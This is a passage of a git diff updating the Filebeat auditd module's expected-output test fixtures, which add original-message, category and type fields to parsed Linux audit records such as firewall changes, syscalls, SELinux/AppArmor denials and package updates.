"loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.562:60): table=security family=10 entries=4", "event.type": [ "change" ], @@ -2076,9 +2648,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.562:60): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=14db720 items=0 ppid=296 pid=497 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2103,15 +2682,19 @@ "@timestamp": "2016-12-07T02:16:25.566Z", "auditd.log.entries": 4, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 61, "auditd.log.table": "security", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.566:61): table=security family=10 entries=4", "event.type": [ "change" ], @@ -2134,9 +2717,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.566:61): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=9d2720 items=0 ppid=296 pid=499 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2161,15 +2751,19 @@ "@timestamp": "2016-12-07T02:16:25.569Z", "auditd.log.entries": 3, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 62, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.569:62): table=raw family=10 entries=3", "event.type": [ "change" ], @@ -2192,9 +2786,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.569:62): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=fae5c0 items=0 ppid=296 pid=500 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2219,15 +2820,19 @@ "@timestamp": "2016-12-07T02:16:25.573Z", "auditd.log.entries": 3, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 63, "auditd.log.table": "raw", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.573:63): table=raw family=10 entries=3", "event.type": [ "change" ], @@ -2250,9 +2855,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.573:63): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=19545c0 items=0 ppid=296 pid=502 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2277,15 +2889,19 @@ "@timestamp": "2016-12-07T02:16:25.575Z", "auditd.log.entries": 4, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 64, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.575:64): table=filter family=10 entries=4", "event.type": [ "change" ], @@ -2308,9 +2924,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.575:64): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=23a3720 items=0 ppid=296 pid=503 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2335,15 +2958,19 @@ "@timestamp": "2016-12-07T02:16:25.578Z", "auditd.log.entries": 4, "auditd.log.family": "10", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 65, "auditd.log.table": "filter", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.578:65): table=filter family=10 entries=4", "event.type": [ "change" ], @@ -2366,9 +2993,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.578:65): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=29 a2=40 a3=162d720 items=0 ppid=296 pid=505 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"ip6tables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2393,15 +3027,19 @@ "@timestamp": "2016-12-07T02:16:25.580Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 66, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.580:66): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -2424,9 +3062,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.580:66): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=14b0850 items=0 ppid=296 pid=506 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2451,15 +3096,19 @@ "@timestamp": "2016-12-07T02:16:25.582Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 67, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.582:67): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -2482,9 +3131,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.582:67): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=2398850 items=0 ppid=296 pid=507 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2509,15 +3165,19 @@ "@timestamp": "2016-12-07T02:16:25.583Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 68, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.583:68): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -2540,9 +3200,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.583:68): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=2679850 items=0 ppid=296 pid=508 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2567,15 +3234,19 @@ "@timestamp": "2016-12-07T02:16:25.585Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 69, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.585:69): table=mangle family=2 entries=6", "event.type": [ "change" ], @@ -2598,9 +3269,16 @@ "auditd.log.syscall": "54", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1481076985.585:69): arch=c000003e syscall=54 success=yes exit=0 a0=4 a1=0 a2=40 a3=1715850 items=0 ppid=296 pid=509 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"iptables\" exe=\"/usr/sbin/xtables-multi\" subj=system_u:system_r:iptables_t:s0 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -2625,15 +3303,19 @@ "@timestamp": "2016-12-07T02:16:25.587Z", "auditd.log.entries": 6, "auditd.log.family": "2", + "auditd.log.record_type": "NETFILTER_CFG", "auditd.log.sequence": 70, "auditd.log.table": "mangle", - "event.action": "netfilter_cfg", + "event.action": [ + "loaded-firewall-rule-to" + ], "event.category": [ "configuration" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=NETFILTER_CFG msg=audit(1481076985.587:70): table=mangle family=2 entries=6", "event.type": [ "change" ], diff --git a/filebeat/module/auditd/log/test/audit-ubuntu1604.log-expected.json b/filebeat/module/auditd/log/test/audit-ubuntu1604.log-expected.json index 3fb44f8934a6..c888d8d3c732 100644 --- a/filebeat/module/auditd/log/test/audit-ubuntu1604.log-expected.json +++ b/filebeat/module/auditd/log/test/audit-ubuntu1604.log-expected.json @@ -13,9 +13,16 @@ "auditd.log.syscall": "43", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1492752520.441:8832): arch=c000003e syscall=43 success=yes exit=5 a0=3 a1=7ffd0dc80040 a2=7ffd0dc7ffd0 a3=0 items=0 ppid=1 pid=1663 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"sshd\" exe=\"/usr/sbin/sshd\" key=\"key=net\"", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -45,6 +52,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SOCKADDR msg=audit(1492752520.441:8832): saddr=0200E31C4853E6640000000000000000", "fileset.name": "log", "input.type": "log", "log.offset": 300, @@ -58,6 +66,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=PROCTITLE msg=audit(1492752520.441:8832): proctitle=\"(sshd)\"", "fileset.name": "log", "input.type": "log", "log.offset": 385, @@ -77,9 +86,16 @@ "auditd.log.syscall": "42", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1492753107.096:9004): arch=c000003e syscall=42 success=no exit=-115 a0=5 a1=7ffc12ac3ab0 a2=10 a3=4 items=0 ppid=1 pid=1648 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"google_ip_forwa\" exe=\"/usr/bin/python3.5\" key=\"key=net\"", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -109,6 +125,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SOCKADDR msg=audit(1492753107.096:9004): saddr=02000050A9FEA9FE0000000000000000", "fileset.name": "log", "input.type": "log", "log.offset": 758, @@ -122,6 +139,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=PROCTITLE msg=audit(1492753107.096:9004): proctitle=\"(g_daemon)\"", "fileset.name": "log", "input.type": "log", "log.offset": 843, diff --git a/filebeat/module/auditd/log/test/avc.log b/filebeat/module/auditd/log/test/avc.log new file mode 100644 index 000000000000..04443e4c0ca1 --- /dev/null +++ b/filebeat/module/auditd/log/test/avc.log @@ -0,0 +1,3 @@ +type=AVC msg=audit(1226874073.147:96): avc: denied { getattr } for pid=2465 comm="httpd" path="/var/www/html/file1" dev=dm-0 ino=284133 scontext=unconfined_u:system_r:httpd_t:s0 tcontext=unconfined_u:object_r:samba_share_t:s0 tclass=file +type=AVC msg=audit(1524662933.080:61207): apparmor="DENIED" operation="ptrace" profile="docker-default" pid=5571 comm="metricbeat" requested_mask="trace" denied_mask="trace" peer="unconfined" +type=AVC msg=audit(1524662933.080:61207): seresult=1 diff --git a/filebeat/module/auditd/log/test/avc.log-expected.json b/filebeat/module/auditd/log/test/avc.log-expected.json new file mode 100644 index 000000000000..3179d7f8b092 --- /dev/null +++ b/filebeat/module/auditd/log/test/avc.log-expected.json @@ -0,0 +1,64 @@ +[ + { + "@timestamp": "2008-11-16T22:21:13.147Z", + "auditd.log.dev": "dm-0", + "auditd.log.ino": "284133", + "auditd.log.path": "/var/www/html/file1", + "auditd.log.scontext": "unconfined_u:system_r:httpd_t:s0", + "auditd.log.sequence": 96, + "auditd.log.tclass": "file", + "auditd.log.tcontext": "unconfined_u:object_r:samba_share_t:s0", + "event.action": "avc", + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=AVC msg=audit(1226874073.147:96): avc: denied { getattr } for pid=2465 comm=\"httpd\" path=\"/var/www/html/file1\" dev=dm-0 ino=284133 scontext=unconfined_u:system_r:httpd_t:s0 tcontext=unconfined_u:object_r:samba_share_t:s0 tclass=file", + "fileset.name": "log", + "input.type": "log", + "log.offset": 0, + "process.name": "httpd", + "process.pid": 2465, + "service.type": "auditd" + }, + { + "@timestamp": "2018-04-25T13:28:53.080Z", + "auditd.log.apparmor": "DENIED", + "auditd.log.denied_mask": "trace", + "auditd.log.operation": "ptrace", + "auditd.log.peer": "unconfined", + "auditd.log.profile": "docker-default", + "auditd.log.record_type": "AVC", + "auditd.log.requested_mask": "trace", + "auditd.log.sequence": 61207, + "event.action": [ + "violated-apparmor-policy" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=AVC msg=audit(1524662933.080:61207): apparmor=\"DENIED\" operation=\"ptrace\" profile=\"docker-default\" pid=5571 comm=\"metricbeat\" requested_mask=\"trace\" denied_mask=\"trace\" peer=\"unconfined\"", + "fileset.name": "log", + "input.type": "log", + "log.offset": 241, + "process.name": "metricbeat", + "process.pid": 5571, + "service.type": "auditd" + }, + { + "@timestamp": "2018-04-25T13:28:53.080Z", + "auditd.log.record_type": "AVC", + "auditd.log.sequence": 61207, + "auditd.log.seresult": "1", + "event.action": [ + "violated-selinux-policy" + ], + "event.dataset": "auditd.log", + "event.kind": "event", + "event.module": "auditd", + "event.original": "type=AVC msg=audit(1524662933.080:61207): seresult=1", + "fileset.name": "log", + "input.type": "log", + "log.offset": 433, + "service.type": "auditd" + } +] \ No newline at end of file diff --git a/filebeat/module/auditd/log/test/test.log-expected.json b/filebeat/module/auditd/log/test/test.log-expected.json index 8eb1b61a43e8..48caa4ae6c5b 100644 --- a/filebeat/module/auditd/log/test/test.log-expected.json +++ b/filebeat/module/auditd/log/test/test.log-expected.json @@ -11,6 +11,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=MAC_IPSEC_EVENT msg=audit(1485893834.891:18877201): op=SPD-delete auid=4294967295 ses=4294967295 res=1 src=192.168.2.0 src_prefixlen=24 dst=192.168.0.0 dst_prefixlen=16", "event.outcome": "1", "fileset.name": "log", "input.type": "log", @@ -33,9 +34,16 @@ "auditd.log.syscall": "44", "auditd.log.tty": "(none)", "event.action": "syscall", + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1485893834.891:18877199): arch=c000003e syscall=44 success=yes exit=184 a0=9 a1=7f564b2672a0 a2=b8 a3=0 items=0 ppid=1240 pid=1281 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"charon\" exe=2F7573722F6C6962657865632F7374726F6E677377616E2F636861726F6E202864656C6574656429 key=(null)", + "event.type": [ + "info" + ], "fileset.name": "log", "host.architecture": "x86_64", "input.type": "log", @@ -59,13 +67,23 @@ }, { "@timestamp": "2017-03-14T19:20:56.192Z", + "auditd.log.record_type": "USER_CMD", "auditd.log.sequence": 19600329, "auditd.log.ses": "11988", - "event.action": "user_cmd", + "event.action": [ + "ran-command" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=USER_CMD msg=audit(1489519256.192:19600329): user pid=4151 uid=497 auid=700 ses=11988 msg='cwd=\"/\" cmd=2F7573722F6C696236342F6E6167696F732F706C7567696E732F636865636B5F617374657269736B5F7369705F7065657273202D7020323032 terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "start" + ], "fileset.name": "log", "input.type": "log", "log.offset": 536, @@ -90,16 +108,26 @@ "auditd.log.lport": 22, "auditd.log.op": "start", "auditd.log.pfs": "curve25519-sha256@libssh.org", + "auditd.log.record_type": "CRYPTO_SESSION", "auditd.log.rport": 63927, "auditd.log.sequence": 406, "auditd.log.ses": "4294967295", "auditd.log.spid": "1299", "auditd.log.subj": "system_u:system_r:sshd_t:s0-s0:c0.c1023", - "event.action": "crypto_session", + "event.action": [ + "started-crypto-session" + ], + "event.category": [ + "process" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe=\"/usr/sbin/sshd\" hostname=? addr=96.241.146.97 terminal=? res=success'", "event.outcome": "success", + "event.type": [ + "info" + ], "fileset.name": "log", "input.type": "log", "log.offset": 783, @@ -127,12 +155,16 @@ "auditd.log.data": "eh^?^?echo test^Mvim /etc/pam.d/password-auth-ac^Mman pam_tty_audit^Mman pam.d^Mvim /etc^Asudo ^E/pamd.sy^?^?^?^?^?.^?m.d/sy^I-a^Ia^?-a^I^Mman pam^Mt^?grep sys^?^?^?/var/lo^Ig/me^Is^I | grep pam_tty^Mgrep pam_tty /var/log/mes^I^M^[[A^Asudo ^Msudo su^M", "auditd.log.major": "136", "auditd.log.minor": "0", + "auditd.log.record_type": "TTY", "auditd.log.sequence": 1065565, "auditd.log.ses": "762", - "event.action": "tty", + "event.action": [ + "typed" + ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=TTY msg=audit(1491924063.550:1065565): tty pid=27930 uid=1000 auid=1000 ses=762 major=136 minor=0 comm=\"bash\" data=65687F7F6563686F20746573740D76696D202F6574632F70616D2E642F70617373776F72642D617574682D61630D6D616E2070616D5F7474795F61756469740D6D616E2070616D2E640D76696D202F657463017375646F20052F70616D642E73797F7F7F7F7F2E7F6D2E642F7379092D6109617F2D61090D6D616E2070616D0D747F67726570207379737F7F7F2F7661722F6C6F09672F6D65097309207C20677265702070616D5F7474790D677265702070616D5F747479202F7661722F6C6F672F6D6573090D1B5B41017375646F200D7375646F2073750D", "fileset.name": "log", "input.type": "log", "log.offset": 1178, @@ -150,6 +182,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=PROCTITLE msg=audit(1451781471.394:194438): proctitle=\"bash\"", "fileset.name": "log", "input.type": "log", "log.offset": 1733, @@ -163,6 +196,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=PROCTITLE msg=audit(1451781471.394:194440): proctitle=737368643A206275726E205B707269765D", "fileset.name": "log", "input.type": "log", "log.offset": 1799, @@ -172,19 +206,23 @@ "@timestamp": "2019-11-15T19:01:24.309Z", "auditd.log.gpg_res": "1", "auditd.log.key_enforce": "0", + "auditd.log.record_type": "SOFTWARE_UPDATE", "auditd.log.root_dir": "/", "auditd.log.sequence": 785, "auditd.log.ses": "3", "auditd.log.subj": "unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023", "auditd.log.sw": "gcc-4.8.5-39.el7.x86_64", "auditd.log.sw_type": "rpm", - "event.action": "software_update", + "event.action": [ + "package-updated" + ], "event.category": [ "package" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SOFTWARE_UPDATE msg=audit(1573844484.309:785): pid=3157 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='sw=\"gcc-4.8.5-39.el7.x86_64\" sw_type=rpm key_enforce=0 gpg_res=1 root_dir=\"/\" comm=\"yum\" exe=\"/usr/bin/python2.7\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": [ "info" @@ -201,14 +239,18 @@ }, { "@timestamp": "2019-11-15T19:00:56.144Z", + "auditd.log.record_type": "SYSTEM_BOOT", "auditd.log.sequence": 5, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", - "event.action": "system_boot", + "event.action": [ + "booted-system" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSTEM_BOOT msg=audit(1573844456.144:5): pid=678 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "info", "fileset.name": "log", @@ -223,14 +265,18 @@ }, { "@timestamp": "2019-11-15T19:01:57.054Z", + "auditd.log.record_type": "SYSTEM_SHUTDOWN", "auditd.log.sequence": 1163, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:init_t:s0", - "event.action": "system_shutdown", + "event.action": [ + "shutdown-system" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSTEM_SHUTDOWN msg=audit(1573844517.054:1163): pid=4440 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "info", "fileset.name": "log", @@ -251,6 +297,7 @@ "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=EXECVE msg=audit(1581371984.206:579393): argc=1 a0=top", "fileset.name": "log", "input.type": "log", "log.offset": 2688, @@ -264,17 +311,21 @@ "auditd.log.a2": "0x1fd4640", "auditd.log.a3": "0x7ffc6939f360", "auditd.log.items": "2", + "auditd.log.record_type": "SYSCALL", "auditd.log.sequence": 579398, "auditd.log.ses": "2", "auditd.log.subj": "unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023", "auditd.log.success": "yes", "auditd.log.syscall": "execve", "auditd.log.tty": "pts0", - "event.action": "syscall", + "event.action": [ + "executed" + ], "event.category": "process", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=SYSCALL msg=audit(1581371984.206:579398): arch=x86_64 syscall=execve success=yes exit=0 a0=0x1fd05c0 a1=0x1fd2730 a2=0x1fd4640 a3=0x7ffc6939f360 items=2 ppid=2563 pid=2614 auid=vagrant uid=vagrant gid=vagrant euid=vagrant suid=vagrant fsuid=vagrant egid=vagrant sgid=vagrant fsgid=vagrant tty=pts0 ses=2 comm=top exe=/usr/bin/top subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=(null)", "event.type": "info", "fileset.name": "log", "host.architecture": "x86_64", @@ -299,16 +350,20 @@ { "@timestamp": "2020-02-10T21:59:44.206Z", "auditd.log.name": "mymodule", + "auditd.log.record_type": "KERN_MODULE", "auditd.log.sequence": 579397, - "event.action": "kern_module", + "event.action": [ + "loaded-kernel-module" + ], "event.category": [ "driver" ], "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=KERN_MODULE msg=audit(1581371984.206:579397): name=mymodule", "event.type": [ - "info" + "start" ], "fileset.name": "log", "input.type": "log", @@ -319,14 +374,18 @@ "@timestamp": "2017-12-17T10:44:41.075Z", "auditd.log.op": "create", "auditd.log.reason": "api", + "auditd.log.record_type": "VIRT_CONTROL", "auditd.log.sequence": 145, "auditd.log.ses": "3", "auditd.log.subj": "system_u:system_r:container_runtime_t:s0", - "event.action": "virt_control", + "event.action": [ + "issued-vm-control" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=VIRT_CONTROL msg=audit(1513507481.075:145): pid=1431 uid=0 auid=100 ses=3 subj=system_u:system_r:container_runtime_t:s0 msg='user=root reason=api op=create vm=? vm-pid=? hostname=? exe=\"/usr/bin/dockerd-current\" addr=? terminal=? res=success'", "event.outcome": "success", "event.type": "creation", "fileset.name": "log", @@ -343,6 +402,7 @@ "@timestamp": "2016-12-16T15:45:43.572Z", "auditd.log.img-ctx": "system_u:object_r:svirt_image_t:s0:c444,c977", "auditd.log.model": "selinux", + "auditd.log.record_type": "VIRT_MACHINE_ID", "auditd.log.sequence": 23118, "auditd.log.ses": "4294967295", "auditd.log.subj": "system_u:system_r:virtd_t:s0-s0:c0.c1023", @@ -352,11 +412,14 @@ "auditd.log.vm-ctx": "system_u:system_r:svirt_t:s0:c444,c977", "container.name": "rhel-work3", "container.runtime": "kvm", - "event.action": "virt_machine_id", + "event.action": [ + "assigned-vm-id" + ], "event.category": "host", "event.dataset": "auditd.log", "event.kind": "event", "event.module": "auditd", + "event.original": "type=VIRT_MACHINE_ID msg=audit(1481903143.572:23118): pid=5637 uid=0 auid=4294967295 ses=4294967295 